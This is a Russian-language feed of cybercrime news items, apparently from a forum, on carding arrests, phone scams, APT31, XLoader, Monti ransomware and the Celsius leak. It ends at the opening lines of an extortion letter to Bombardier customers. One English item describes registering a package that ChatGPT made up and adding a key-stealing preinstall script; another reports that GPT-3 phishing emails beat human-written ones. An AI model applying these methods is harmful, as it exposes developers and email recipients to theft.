Следователь полиции американского Баффало (штат Нью-Йорк) мог быть причастным к кардерской деятельности. Об этом пишет портал HSToday, в распоряжении которого оказались материалы дела в отношении 33-летнего Терренса Майкла Чишека (Terrance Michael Ciszek) a.k.a DrMonster, и 41-летнего Кори Роберта Доджа (Corey Robert Dodge ) a.k.a Cakesbaylor.
В официальных документах суда отмечается, что офицер Чишек в период с марта по июль 2020 года совершил на Genesis Market 11 покупок, которые включали 194 набора украденных учетных данных. Следователи также установили, что полицейский владел биткойн-кошельками, связанными с кардерским ресурсом UniCC. Додж в период с марта 2020 года по май 2021-го совершил 14 покупок на Genesis Market, в которых были примерно 8,5 тысячи украденных учетных записей Paypal, Tracfone, eBay, Amazon, FedEx, Etsy, Walmart, Chase, Venmo и eTrade.
Обоим фигурантам уголовного дела предъявлены обвинения в хранении 15 или более устройств несанкционированного доступа. Максимальное наказание по этой статье составляет 10 лет лишения свободы и штраф в размере 250 тысяч долларов. Обвиняемые выпущены под залог.
source: hstoday.us/subject-matter-areas/cybersecurity/buffalo-police- detective-one-of-two-men-charged-for-buying-stolen-account-credentials-on- illicit-online-marketplace
A new threat has emerged for web3 developers and it involves the use of ChatGPT.
ChatGPT"s one fallibility is to produce misinformation and create false information. Therefore, if a developer were to utilize ChatGPT as a coding assistance, it is possible for it to suggest a non-existent package which hackers could utilize. If a developer were to blindly accept the suggested code without verifying the validity of the package, then they could inadvertently introduce malicious code into their project, putting their information at risk.
For example, if ChatGPT suggested a fake package named "web3.eth.utils," then a malicious actor could create that package which could be employed with a preinstall script. Preinstall scripts are executed before a package is installed, and they often perform legitimate various tasks such as downloading additional resources. In this case, the malicious preinstall script would run undetected and capture sensitive information such as private keys from the developer's system.
Most developers should be diligent enough to ensure the package they are install is legitimate, but everybody makes mistakes
leave a like if you enjoyed ))
source: twitter.com/realscamsniffer/status/1669622780495814657?s=46&t=lQvA9Sqmp4_ijksYKq05Lg
В США правоохранительные органы задержали четверых граждан, которые подозреваются в групповом ограблении банкомата. Об этом сообщает New York Post.
Инцидент произошел в Нэшвилле, штат Теннеси. По данным следствия, четверо обвиняемых ограбили банкомат, когда его обслуживал технический сотрудник. Двое злоумышленников подошли к мужчине, сказали ему «не делать глупостей» и отдать деньги. Сотрудник выполнил требование грабителей, после чего мужчины сели в автомобили и скрылись.
Спустя время полицейским удалось установить личности преступников. Одним из них оказался 30-летний рэпер Ладесион Райли, в текстах которого описываются грабежи банкоматов в разных штатах, тысячи долларов в машине и молитвы о том, чтобы его не поймала полиция.
source: nypost.com/2022/06/10/texas-rapper-ladesion-riley-arrested-for- robbing-atm-in-nashville
Прокуратура северного округа Техаса сообщила, что Сербия экстрадировала в Соединенные Штаты своего гражданина, обвиняемого в обмане инвесторов на сумму более $70 млн.
Власти Сербии арестовали 32-летнего Антоние Стоилковича в июле 2020 года в Белграде по запросу правоохранителей США. Впоследствии он согласился на экстрадицию.
Суд в Далласе намерен предъявить Стоилковичу и его партнерам обвинение в сговоре с целью мошенничества и отмывания денег. Прокуратура утверждает, что более десятка предполагаемых мошенников выманили у потерпевших, среди которых оказались жители Техаса, десятки миллионов долларов.
Подозреваемые создали более 20 фейковых площадок для инвестирования в бинарные опционы и майнинг биткоина, обещая среднюю прибыль на сделку до 80%. Они утверждали, что инвесторы смогут покупать первую криптовалюту за половину стоимости на их майнинговых платформах.
Для поддельных компаний, включая Options Rider, Bancde Options, Start Options, Dragon Mining, BTC Mining Factor и Trinity Mining, злоумышленники создали ложные профили руководства с именами и фотографиями, в основном женскими. Чтобы убедить потенциальных вкладчиков в легальности платформ, они даже проводили видеоконференции.
После перевода денег ответчики предоставляли инвесторам доступ к порталу, на котором неизменно демонстрировалась положительная доходность вложений, якобы торговая активность и история вывода средств. На самом деле реальной деятельности не велось, а полученные средства подозреваемые использовали на личные нужды и поддержание работы мошеннической схемы.
«Эта афера на $70 млн охватила несколько континентов и была нацелена как на американских граждан, так и на иностранцев», — заявил исполняющий обязанности прокурора США Прерак Шах.
Часть сообщников Стоилковича задержала полиция Сербии в ходе июльской операции, одного арестовали в октябре в Калифорнии. В случае признания виновными ему и соучастникам грозит до 20 лет лишения свободы.
Напомним, аналогичный срок может получить в США 24-летний гражданин Австралии, признавший вину в мошенничестве при управлении зарегистрированным в Нью-Йорке криптовалютным хедж-фондом.
Небольшое исследование показало, что третье поколение алгоритма обработки естественного языка GPT-3 можно использовать вместе с платформами «ИИ как сервис» для массовых рассылок целевого фишинга. Более того, специалисты пришли к выводу, что искусственный интеллект способен составлять лучшие фишинговые письма, чем человек.
На самом деле, исследователи уже давно спорят, выгодно ли злоумышленникам будет натренировать алгоритмы машинного обучения таким образом, чтобы они генерировали качественные фишинговые письма.
Уже сейчас массовый фишинг весьма эффективен, при этом достаточно прост в исполнении и подготовке. Тем не менее организовать нечто вроде целевого фишинга уже гораздо сложнее, поскольку там должны учитываться индивидуальные особенности и потребности жертвы.
Именно эту тему обсудили эксперты на конференциях Black Hat и Defcon. В частности, специалисты представили результаты своего эксперимента, в котором они сравнивали эффективность собственных фишинговых писем с тем, что создал искусственный интеллект.
Оба типа электронных писем содержали ссылки, которые не являлись вредоносными в прямом смысле этого слова. Однако такие URL фиксировали каждый клик и каждый переход, давая исследователям подробную картину эффективности.
В результате специалистов удивил тот факт, что люди куда охотнее кликали на ссылки в тех письмах, которые составил ИИ. Причём отрыв от подготовленных людьми сообщений был действительно значительный.
«Как отметили исследователи, натренировать по-настоящему качественную модель довольно трудно — на это уйдут миллионы долларов. Тем не менее можно прибегать к платформам, предоставляющим подобные возможности по модели "ИИ как услуга"», — передаёт Wired объяснения специалиста Юджина Лима.
Экспертам еще предстоит узнать источник нового вымогателя Monti.
С момента закрытия инфраструктуры Conti в мае деятельность группировки приостановилась. Некоторые исследователи предположили, что снижение активности Conti является результатом ребрендинга. А другие эксперты считают, что в различных кампаниях по RaaS-модели участвовали бывшие члены Conti, которые перешли в состав других групп, в том числе Karakurt и Black Basta .
Сейчас нет доказательств того, что Conti переименовывается в Monti, однако, код программы-вымогателя Conti просочился в открытый доступ в марте 2022 года . Это значит, что любой хакер может использовать общедоступный исходный код для создания собственной программы-вымогателя на основе Conti.
Исследователи Intel 471 считают , что таким образом была создана программа- вымогатель Monti, исходя из анализа кода. Более того, точка входа Monti очень похожа на точку входа Conti. Monti может быть ребрендингом Conti или просто новым вариантом программы-вымогателя, который был разработан с использованием общедоступного исходного кода.
source: intel471.com/blog/conti-vs-monti-a-reinvention-or-just-a-simple- rebranding?&web_view=true
Известный киберпреступник, который использовал зашифрованную платформу социальных сетей Telegram в серии затяжных мошенничеств, был приговорен к трем годам тюремного заключения Королевским судом Кройдона за мошенничество с использованием ложных сведений, предоставление статей для мошенничества и использование статей. в мошенничестве.
21-летний Рамзан Абубакаров из Хендона, север Лондона, не признал себя виновным по всем пунктам обвинения, но 9 декабря 2022 года признал себя виновным в 10 преступлениях.
Он использовал различные онлайн-маски для координации мошеннических действий на своем канале Telegram, который когда-то был одним из крупнейших каналов в Великобритании, где Telegram является относительно небольшим игроком по сравнению с некоторыми другими платформами.
Абубакаров отвечал за создание веб-службы киберпреступности iChop.it, по сути, платформы для покупки и продажи скомпрометированных личных и финансовых данных.
Считается, что, продавая хакерские инструменты другим киберпреступникам, Абубакаров несет полную ответственность за убытки на сумму более 1,9 миллиона фунтов стерлингов.
Он также был замешан в различных махинациях, включая подачу ложных налоговых деклараций в HMRC, подачу заявки на правительственную схему кредита Bounce Back Covid и взлом личных банковских счетов.
Глава столичной полиции по борьбе с киберпреступностью, детектив- суперинтендант Хелен Рэнс, сказала: «Захват инструментов и систем, которые позволяют преступникам использовать и нацеливаться на невинных людей, является огромной проблемой для нас и наших партнеров, однако мы полны решимости привлечь этих преступников к ответственности. . . Мы заново изобретаем методы расследования мошенничества и киберпреступлений, и таким образом мы можем выявлять преступников и преследовать их, а также защищать новых жертв».
Деятельность Абубакарова стала известна после того, как он был идентифицирован как причастный к различным мошенничествам Альянсом киберзащиты (CDA), базирующейся в Великобритании группой банков и правоохранительных органов, которые вместе работают над такими вопросами. Затем эта информация была передана команде по борьбе с киберпреступностью Метрополитена, которая отследила ее с помощью активной защиты криптовалюты, анализа данных связи и работы в партнерстве с банками и HMRC.
Во время ареста в ноябре 2021 года полиция обнаружила и изъяла ноутбуки и смартфоны с домашнего адреса Абубакарова, анализ которых привел к обнаружению скомпрометированных личных и финансовых данных более 30 000 жертв, специального фишингового набора, предназначенного для атак на различные розничные банки. и более миллиона британских и международных мобильных номеров.
Детектив-констебль Ойедеджи, руководивший расследованием, сказал: «Успех этого расследования является результатом эффективного сотрудничества с нашими партнерами, особенно с CDA. Это полезно для моей команды, и я знаю, что мы смогли защитить тысячи жертв от киберпреступников».
Успешное осуждение Абубакарова — очередная победа столичной полиции в борьбе с цифровым мошенничеством.
В ноябре 2022 года он сыграл ключевую роль в международной ликвидации iSpoof.cc, подпольного веб-сайта, который продавал услуги спуфинга вызовов, которые позволяли киберпреступникам выдавать себя за доверенные организации, такие как банки, при нацеливании на жертв.
Помимо ареста лондонского администратора сайта, полиция также смогла извлечь с сервера сайта более 70 миллионов строк данных и записей о платежах в криптовалюте, которые использовались для отслеживания и ареста более 100 британских пользователей сервиса. из которых не менее 100 фунтов стерлингов было потрачено на сервис iSpoof.cc.
source: news.met.police.uk/news/man-jailed-for-operating-encrypted-social- media-platform-to-steal-millions-from-victims-461673
Боты Tesla Optimus будут справляться с ежедневными человеческими задачами, от приёма посылки до присмотра за детьми
«Optimus — ваш личный C3PO или R2-D2, но лучше. Это также изменит физический труд в промышленности», — пишет Tesla.
Маск надеется, что в перспективе многие семьи смогут позволить себе собственного бота Optimus. Планируемая стоимость такого робота — 30к$Click to expand...
Это новый вектор атак с переходом в реальную жизнь. Интересно сколько будет новостей про то как "робот запер человека в туалете и требовал выкуп". Или еще миллион атак типа поджога дома (убедили робота приготовить ужин по рецепту: нагреть литр масла 10 минут на максимальном огне и добавить воды), угрозы жизни и т.д
Правозащитные организации опасаются злоупотреблений расплывчатыми и неуточнёнными пунктами договора.
ООН проводит четвёртую переговорную сессию о создании Соглашения ООН, направленном на совершенствование глобальных действий по борьбе с киберпреступностью. Однако, правозащитные группы опасаются злоупотреблений расплывчатыми и неуточнёнными пунктами этого договора
Специальный комитет по разработке Всеобъемлющей международной конвенции о противодействии использованию информационных и коммуникационных технологий в преступных целях впервые провел собрание в феврале 2022 года и намерен завершить работу над документом к началу 2024 года.
Договор ООН будет охватывать международное сотрудничество, доступ международных правоохранительных органов к потенциальным цифровым доказательствам, а также права человека и процессуальные гарантии.
Документ будет основываться на существующей Будапештской конвенции, принятой 67 странами, направленной на борьбу с киберпреступлениями путем гармонизации национального законодательства и обеспечения международного сотрудничества. Однако есть серьезные опасения.
Примечательно, что многие предложенные элементы договора не включают умысел киберпреступления, а это означает, что даже незлонамеренное поведение может быть криминализировано.
«Мы утверждаем, что под киберпреступлениями следует понимать те, которые нацелены конкретно на компьютерные системы, и что договор должен предусматривать мошеннические намерения со стороны обвиняемого», — говорят представители Electronic Frontier Foundation (EFF).
В противном случае «такие законы потенциально могут быть использованы против любого, кто взаимодействовал с компьютером так, что это кому-то просто не понравилось, даже без намерения причинить какой-либо вред, и часто используются для наказания исследователей кибербезопасности или журналистов».
Более того, как отмечает правозащитная организация Human Rights Watch, расплывчато сформулированные законы о киберпреступности, направленные на борьбу с дезинформацией и онлайн-поддержкой терроризма, часто использовались не по назначению, чтобы преследовать инакомыслящих и нарушать свободу слова.
Точно так же есть опасения, что предлагаемые полномочия по расследованию такого рода киберпреступлений могут привести к активному незаконному полицейскому наблюдению в странах-участницах соглашения.
Организации по защите конфиденциальности и правам человека призывают государства заняться всеми этими областями, устанавливая необходимость наличия умысла и следя за тем, чтобы законы не приводили к судебному преследованию осведомителей, активистов и журналистов. EFF добавила, что Все новые законы должны сопровождаться соответствующими гарантиями прав человека.
Жительница американского Росслина (пригород Арлингтона, штат Виргиния), владевшая известной в городе кофейней, оказалась ранее судимым кардером с многолетним стажем. Как сообщает местный портал ArlNow, 50-летняя Адиам Берхейн (Adiam Berhane) годами воровала данные кредитных карт своих клиентов.
Послужной список Берхейн тянется еще с начала 2000-х годов, когда ее осудили за мошенничество с кредитными картами в Нью-Йорке. Выйдя на свободу, женщина на некоторое время затаилась, после чего разработала новую схему: для успешной кражи данных карточек она открыла кофейню. Начиная с 2013 года, Берхейн и двое ее сообщников создавали собственные копии кредиток других людей, покупая с их помощью предоплаченные подарочные карты American Express, предметы роскоши и многие другие товары. Также она реализовывала схему с возвратом средств за совершенные покупки на свои банковские счета.
Другим способом отмыва средств стала кофейня. В период с 2013 по 2016 год Берхейн проводила подарочные карты через свою бухгалтерию. Как позже выяснили следователи, суммарный объем мошеннических транзакций составлял до трети от общей выручки заведения. В итоге Берхейн была арестована в 2017 году, ей и ее сообщникам были предъявлены обвинения в банковском мошенничестве, краже персональных данных и других преступлениях.
Однако из-за размаха мошенничества объем уголовного дела превышал несколько тысяч страниц. Поэтому прокуратура Арлингтона не смогла довести дело до суда: местные законы запрещают подобную нагрузку на адвокатов защиты. Следствием этого стало то, что Берхейн начала заниматься федеральная прокуратура США, а на уровне города оставили дело ее сообщника, который тогда же, в 2017 году, был приговорен к 14 годам реального и 11 годам условного заключения.
К дальнейшему расследованию дела Берхейн были привлечены сотрудники Секретной службы Министерства внутренней безопасности США. Точное количество украденных денег не смогли установить даже они, однако по доказанным эпизодам сумма составляет несколько сотен тысяч долларов. Женщина грозило до 196 лет тюрьмы, однако в итоге она «отделалась» приговором к 10 годам заключения. Еще двое ее сообщников получили два года условно и уже отбытый срок плюс шестимесячный домашний арест.
На двоих бизнесмены заработалии около 100 тыс. рубчиков.
Сотрудники Управления уголовного розыска УМВД России по Камчатскому краю совместно с коллегами из УМВД России по городу Петропавловску-Камчатскому задержали двоих местных жителей. Ранее неоднократно судимый россиянин и гражданин одного из государств ближнего зарубежья подозреваются в серии мошенничеств.«Предварительно установлено, что злоумышленники причастны к преступлениям в отношении пенсионеров в возрасте от 73 до 88 лет.
Подозреваемые выполняли функции курьеров и забирали у пожилых людей деньги, которые у них выманивали телефонные мошенники.Аферисты звонили и представлялись адвокатами или сотрудниками правоохранительных органов. Они сообщали собеседникам, что их родные стали виновниками ДТП с тяжкими последствиями и находятся в больнице. Для освобождения от ответственности требовали крупные суммы – от 100 до 900 тысяч рублей. Для правдоподобности предлагали также передать вместе с деньгами одежду и средства личной гигиены для родственников», - рассказала официальный представитель МВД России Ирина Волк.Подготовленные посылки забирали курьеры, которые через банкоматы переводили средства на счета сообщников.
Себе в качестве вознаграждения они оставляли пять процентов от перечисленного. Общий ущерб от противоправных действий составил порядка двух миллионов рублей.
«В результате оперативной работы полицейские установили личности подозреваемых и при поддержке сотрудников Росгвардии задержали их. Изъяты средства связи и другие предметы, имеющие доказательственное значение.Следователями следственной части Следственного управления УМВД России по Камчатскому краю расследуются уголовные дела по признакам преступлений, предусмотренных статьей 159 УК РФ. Фигурантам избрана мера пресечения в виде заключения под стражу»
Click to expand...
сообщила Ирина Волк.
За торговлю чужими аккаунтами задержан житель Минщины
Оперативники по борьбе с киберпреступлениями получили информацию, что 40-летний житель Вилейки является активным участником теневых форумов и может быть причастен к совершению киберпреступлений.
Установлено, что с 2015 года мужчина занимался оптовой скупкой верифицированных учетных записей криптобирж, социальных сетей, электронных почтовых ящиков на теневых форумах и ботах в мессенджере. После он перепродавал аккаунты, принадлежащие иностранцам (США, Россия, Украина, Казахстан, Литва и т.д.) в собственном интернет-магазине. При этом фигурант осознавал, что покупатели будут использовать учетные записи для вывода похищенных денежных средств и иной преступной деятельности.
О своей деятельности в интернете и заработке мужчина не распространялся. Его ежемесячная прибыль составляла свыше 10 тысяч долларов. При обыске дома у задержанного обнаружено около 100 тысяч долларов наличными и криптовалюты в эквиваленте на 500 тысяч долларов.
Следователями возбуждено уголовное дело за незаконный оборот средств платежа.
Новый сайт научит россиян распознавать мошенников в интернете.
Центральный банк России запустил обучающий веб-сайт " Рублерост ", который замаскирован под проекты различных мошенников. Цель проекта - помочь российским пользователям научиться распознавать финансовые пирамиды и обман в интернете.
На "Рублеросте" собраны "лучшие практики", ознакомление с которыми поможет не попасться на удочку аферистов, сообщили в Банке. Регулятор отметил, что мошенники заманивают жертв, предлагая высокую доходность, а также используют социальную инженерию, чтобы убедить людей принять решение быстро.
«Пирамиды стараются мимикрировать под добросовестных участников рынка, но их суть остаётся прежней: это схема по привлечению денег людей, при которой прибыль выплачивается за счёт средств новых участников, а иногда и не выплачивается вовсе», — предупредил регулятор.
В ЦБ также отметили, что создание подобного сайта является быстрым и дешевым процессом, и мошенники постоянно ищут новые возможности заработать на доверии людей. Поэтому повышение уровня финансовой грамотности является очень важным фактором в борьбе с Мошенничеством.
На сайте «Рублерост» часто появляются различные отвлекающие окна, а также много лишней или некорректной информации. При нажатии на элементы сайта с такими данными возникают предупреждения об обмане.
source:
rublerost.ru/#close
interfax.ru/russia/899994
Сотрудники ФСБ уже несколько недель "зачищают" УВД по ЦАО и многие районные ОВД в центре Москвы. Полицейских проверяют из-за «пробивов». По предварительным данным, сотрудники спецслужб выяснили, что граждане Украины через полицейских получали личные данные в том числе о российских силовиках.
Утечку очень чувствительной информации заметили в середине весны, и подозрения вскоре пали на сотрудников столичного УВД по ЦАО. Как рассказали «Базе» несколько источников, полицейские занимались платными «пробивами» для клиентов из интернета — и этим воспользовались украинцы, которые регулярно оформляли заказы на сведения о силовиках, судьях и прочих спецсубъектах. Правоохранители, искавшие утечку, решили проверить эту гипотезу и провели оперативный эксперимент.
На форумах в даркнете они обнаружили объявления с услугами «пробива», откликнулись на них и попросили прислать данные на различных сотрудников прокуратуры Москвы. Вскоре правоохранители действительно получили запрошенную информацию и заодно подтвердили, что сливают её именно через УВД по ЦАО. Более того, выяснилось, что сотрудники распределяли заказы на «пробив» ещё и по разным районам и другим округам — причём их коллеги даже не подозревали, что участвуют в сливе для клиентов из даркнета.
Когда всё это вскрылось, в органах начались «чистки»: в отделении по Таганскому району уже задержали троих сотрудников, ещё нескольких — в ОВД по Арбату, а его начальник после разноса от руководства написал заявление по собственному желанию. Также заявление на увольнение написал и заместитель начальника УВД по ЦАО — начальник полиции Алексей Щипов. Теперь, по словам источников «Базы», «закручивание гаек» среди полицейских идёт по всей по Москве. В частности, компьютеры с базами данных из отделений тщательно проверили, а многие сотрудники были вызваны «на разговор».
Этот инцидент стал самой крупной утечкой данных криптобиржи со времен Mt.Gox.
Инцидент произошел на прошлой неделе, когда криптобиржа Celsius, находящаяся на грани банкротства, слила огромный набор данных о транзакциях своих пользователей, причем сделала это крайне необычным способом: подала заявление в суд. В рамках процедуры банкротства (в ходе которой владельцы Celsius вывели десятки миллионов долларов до того, как стало известно о ее крахе) адвокаты криптобиржи выпустили документ, который, судя по всему, включает данные о транзакциях полумиллиона ее пользователей с апреля этого года до прекращения торгов в июне. PDF-документ на 14 500 страниц, содержащий в себе огромное количество ценной информации, какое-то время пробыл в открытом доступе на сайте судебных документов PACER, потом был удален оттуда и перенесен в Internet Archive, откуда он был скачан тысячи раз перед окончательным удалением.
В файле находились имена пользователей, детали транзакций, а также даты и суммы каждого платежа. Слитая база данных не включает в себя адреса криптокошельков, но уникальные суммы платежей, детализированные с точностью до более чем десятка знаков после запятой во многих случаях, позволяют сопоставить платежи с записями в блокчейн-системе.
Эксперты считают, что утечка данных Celsius – настоящий подарок для как для профессионалов, так и для криптосыщиков-любителей, позволяющий им идентифицировать и отследить криптовалюту через блокчейн. Это может помочь выявить мошенников, хакеров и прочих злоумышленников, использовавших Celsius в для вывода “грязной” криптовалюты.
Но у этой монеты есть и обратная сторона – слитыми данными могут пользоваться злоумышленники, пытаясь найти жертву с самым плотным криптокошельком.
По словам Ника Бакса, руководителя отдела исследований в Convex Labs, это одна из самых крупных утечек данных со времен Mt.Gox. Однако он тоже признает, что слитая база данных стала “сбывшейся мечтой для аналитиков”, которые занимаются отслеживанием криптовалют.
Всего через несколько дней после слива интернет-сыщики начали публиковать результаты своих расследований, полученные с помощью базы данных Celsius. Например, известный независимый криптосыщик под ником ZachXBT в Twitter опубликовал доказательства того, что криптоаналитик Ларк Дэвис вывел с биржи 2,5 миллиона долларов после того, как прорекламировал ее.
Другой криптосыщик под ником Federico Notte преобразовал PDF-файл из судебного заявления Celsius в электронную таблицу и разместил на нее ссылку в своем аккаунте Twitter. Он рассказал, что надеется использовать эту базу данных в сочетании с анализом блокчейна и попытается обнаружить транзакции крупных торговых фондов, чтобы выяснить их тактику.
source: twitter.com/zachxbt/status/1578402824232308737
По данным властей США и Великобритании, китайские хакеры APT31, предположительно связанные с Министерством государственной безопасности Китая (MSS), атаковали компьютерные сети, электронную почту и облачные хранилища правительственных учреждений, компаний и частных лиц, включая критическую инфраструктуру США, американский бизнес, политиков и их политические партии.
В частности, Великобритания заявила, что APT31 пыталась взломать электронную почту британских парламентариев в 2021 году. Кроме того, британские власти считают, что китайские агенты получили доступ к данным Избирательной комиссии Великобритании в период с 2021 по 2022 год, похитив электронные письма и данные из реестра избирателей.
США предъявили обвинения семерым предполагаемым членам APT31. Вашингтон также объявил награду в размере до $10 млн. за информацию, которая поможет задержать подозреваемых.
Согласно обвинительному заключению, хакеры с 2010 года проводили масштабные кампании по всему миру, шпионя за сетями и аккаунтами, представляющими интерес для Пекина. Жертвами атак стали журналисты, правозащитники, эксперты по внешней политике, ученые, сотрудники IT-компаний, телекоммуникационных предприятий, производственных и торговых компаний, финансовых организаций, консалтинговых агентств, юридических фирм, научно-исследовательских институтов, а также правительственные чиновники и политики, критиковавшие китайское правительство.
Обвинение утверждает, что хакеры похитили коммерческие секреты и персональные данные. Они рассылали электронные письма, якобы от известных американских журналистов, содержащие вредоносные ссылки. При переходе по этим ссылкам у жертв похищалась информация об их местоположении, IP-адресах, сетях и устройствах.
В числе целей APT31, по данным США, значатся сотрудники Белого дома, Министерств юстиции, торговли, финансов, госсекретаря, труда и транспорта, члены Конгресса, супруги высокопоставленных чиновников Министерства юстиции и Белого дома, а также несколько сенаторов США.
За пределами США объектами атак стали члены Межпарламентского альянса по Китаю (IPAC), диссиденты и ученые, критикующие китайское правительство, а также 43 аккаунта британского парламента.
В качестве примера обвинение приводит взлом в 2016 году американского оборонного подрядчика на Лонг-Айленде. Хакеры использовали уязвимость нулевого дня для проникновения в сеть и кражи данных.
Еще одним примером стало вторжение в сети семи MSP-провайдеров в США и за рубежом с 2017 по 2019 год. Получив доступ к системам, хакеры смогли взломать серверы клиентов организаций. Пострадали компании из различных отраслей, включая ведущего поставщика оборудования для сетей 5G в США, сталелитейную компанию, производителя одежды из Нью-Йорка, инженерную компанию из Калифорнии, энергетическую компанию в Техасе и многие другие.
Подсудимому назначен штраф в размере 30 тысяч рублей.
Сайт одного из муниципальных учреждений Калуги подвергся хакерской атаке. Хакера уже нашли сотрудники УФСБ России по Калужской области. Им оказался местный житель. Хакер выводил из строя сайты с использованием вредоносных программ, сообщает пресс-служба калужского управления ФСБ в среду, 18 мая.
«Пресечена противоправная деятельность жителя Калуги, использовавшего вредоносное программное обеспечение в целях нейтрализации средств защиты компьютерной информации сайта одного из муниципальных учреждений», - сказали в пресс-службе ведомства.
На основании собранных материалов возбуждено уголовное дело по ч.1 ст.273 УК РФ «Создание, использование и распространение вредоносных компьютерных программ». На суде хакер согласился с обвинением в полном объеме и ходатайствовал о вынесении приговора без судебного разбирательства. Судья решил применить статью 64 УК РФ («Назначение более мягкого наказания, чем предусмотрено за данное преступление), назначив ему штраф в размере 30 тысяч рублей. Приговор в силу вступил.
Инфостилер XLoader обзавелся новым функционалом, позволяющим вредоносу похищать конфиденциальные данные с компьютеров на базе Apple macOS.
XLoader является наследником Formbook - известного инфостилера для Windows, способного красть учетные данные из различных браузеров, делать снимки экрана, записывать нажатия клавиш, а также загружать и выполнять файлы с подконтрольных злоумышленников доменов. В минувшем году Formbook занимал 4 место в списке наиболее распространенных вредоносных семейств.
По данным специалистов Check Point, вредонос доступен в даркнете по цене от $49 до $129 (в зависимости от версии ОС и срока использования). Что интересно, продавец больше не предлагает исходный код панелей управления - желающие могут приобрести XLoader только на ограниченное время и использовать исключительно сервер продавца. Как пояснили исследователи, централизованная C&C инфраструктура позволяет создателям вредоноса контролировать использование программы.
XLoader распространяется через подложные электронные письма с вредоносным документом Microsoft Office. За шесть месяцев – с декабря 2020 года по июнь 2021 – специалисты зафиксировали случаи инфицирования Formbook/XLoader в 69 странах мира, большая часть инфекций пришлась на США (53%), далее следуют с большим отрывом специальные административные районы Китая (9%), Мексика (5%), Германия (3%), Франция (3%), РФ (3%).
Первые версии Formbook были обнаружены в январе 2016 года на форумах в даркнете, однако их продажа прекратилась в октябре следующего года. Два года спустя вредонос вернулся в виде XLoader и был выставлен на продажу на том же форме, что и Formbook. Оба вредоноса имеют одну и ту же кодову базу, отметили специалисты.
«XLoader более зрелый и сложный по сравнению со своими предшественниками, он поддерживает разные операционные системы, в частности компьютеры на базе macOS. Прежде вредоносное ПО для macOS было не таким распространенным. Обычно оно попадало в категорию шпионских программ и не наносило слишком много ущерба. Однако разрыв между вредоносами для Windows и MacOS постепенно сокращается, и правда состоит в том, что последние становятся более опасными»,
• Source: [https://research.checkpoint.com/202...-with-a-thousand-campaigns- migrates-to-macos/](https://research.checkpoint.com/2021/top-prevalent- malware-with-a-thousand-campaigns-migrates-to-macos/)
Альфа-Банк начнет выплачивать денежное вознаграждение за информацию о телефонных мошенниках, если она поможет раскрыть мошеннический кол-центр или поймать работающих там преступников, пишет РБК. Сумма одного вознаграждения составит 1 млн рублей, всего банк рассчитывает потратить на эти цели 5 млн рублей, но готов увеличить финансирование, если получит много полезных данных, рассказал представитель кредитной организации.
Помочь может любая информация: номер, с которого звонили мошенники, запись разговора (не менее 30 секунд), контакты «черных» кол-центров, данные их руководителей, рассказ о том, кто и почему подозревается в мошенничестве. Но вознаграждение будет выплачиваться, только если эти сведения поспособствуют поимке злоумышленников. Для этого Альфа-Банк создал специальный сайт и почтовый ящик. Информация предоставляется анонимно. Как следует из условий акции, информацию за вознаграждение можно предоставить с 17 марта по 30 апреля, деньги перечисляются только на счет в Альфа-Банке. Клиент несет ответственность за предоставление персональных данных иных субъектов, недостоверные данные и заведомо ложные сведения, предупреждает банк.
Планы по поощрению информаторов о телефонных мошенниках прорабатывает и Тинькофф Банк. Там разрабатывают решение, предполагающее, что клиент, использующий определитель номера «КтоЗвонит», сможет передавать в банк информацию о подозрительных звонках парой кликов. В будущем кредитная организация планирует мотивировать клиентов предоставлять данные о злоумышленниках через геймификацию и бонусы. Основная сложность здесь заключается в последующей работе с полученной информацией: технологии подмены номера легкодоступны, и злоумышленникам не составляет особого труда корректировать номера, с которых совершается вызов, пояснили в Тинькофф Банке.
Вознаграждение за информацию не поможет существенно улучшить ситуацию с телефонным мошенничеством, считают в Райффайзенбанке. В банке «Открытие» оценивают эффективность такой меры как низкую, поскольку «современные средства IP-телефонии позволяют очень многое, чтобы обеспечить анонимность звонящего». Сам банк не планирует платить клиентам за подобную информацию.
По словам экспертов, инициатива вряд ли побудит самих мошенников сдавать друг друга. Данная новость быстро распространится по теневым ресурсам, и подобные люди попадут в черные списки, с ними просто никто не будет работать. Также большинство банковских мошенничеств совершается участниками организованных преступных групп, действующих с территории сопредельных государств, отметили эксперты. По их мнению, информация может помочь найти преступников, но это ответственность правоохранительных органов. В МВД существует специальная база данных ИБД-Ф «Дистанционное мошенничество», в которой собираются все сведения по раскрытым и нераскрытым киберхищениям. Положительной будет любая инициатива, направленная на рост количества обращений в правоохранительные органы, отметили юристы.
Вологодский хакер, умышленно обесточивший 38 поселков в области год назад, предстанет перед судом по уголовному делу, наказание за которое предусматривает до восьми лет колонии, сообщили ТАСС в пресс-службе управления ФСБ России по Вологодской области.
"Завершено расследование уголовного дела в отношении хакера, отключившего от электроэнергии 38 населенных пунктов Вологодской области. УФСБ России по Вологодской области установлено, что в феврале 2023 года житель региона 1975 года рождения получил неправомерный доступ к системам технологического управления электросетями и отключил от электроснабжения 38 населенных пунктов Вологодской области в Шекснинском районе, Устюженском и Бабаевском округах", - говорится в сообщении.
По факту произошедшего возбудили уголовное дело по части 4 статьи 274.1 УК РФ. Его расследование завершено, дело направили в суд для рассмотрения по существу. Фигурант находится под подпиской о невыезде, уточнили ТАСС в УФСБ.
В начале декабря в отдел полиции № 5 УМВД России по городу Чебоксары обратилась 87-летняя женщина, у которой путем обмана было похищено 200 тысяч рублей. Неизвестный, который позвонил на стационарный телефон пенсионерки, сообщил о ДТП якобы по вине ее племянницы и убедил передать все сбережения курьеру. В качестве посыльного выступил один из несовершеннолетних чебоксарцев, второй в это время следил за окружающей обстановкой на улице.
В ходе комплекса оперативно-розыскных мероприятий сотрудники Управления уголовного розыска МВД по Чувашской Республике установили, что в совершении данного преступления участвовали 16-летние юноши из Чебоксар. Деньги пенсионерки они перевели телефонным сообщникам, однако обещанного вознаграждения так и не получили.
Отделом по расследованию преступлений, совершенных с использованием электронных средств платежа, следственного управления УМВД России по г.Чебоксары так называемым курьерам было предъявлено обвинение в групповом мошенничестве с причинением значительного ущерба (ч.2 ст.159 УК РФ). Материалы уголовного дела направлены в Московский районный суд г.Чебоксары. Ущерб потерпевшей родители несовершеннолетних фигурантов возместили в полном объеме в ходе расследования.
A new method of pressure?
Ladies and gentlemen!
If you received this letter, then you are a customer, partner, employee or
competitor
of the aircraft manufacturer Bombardier.
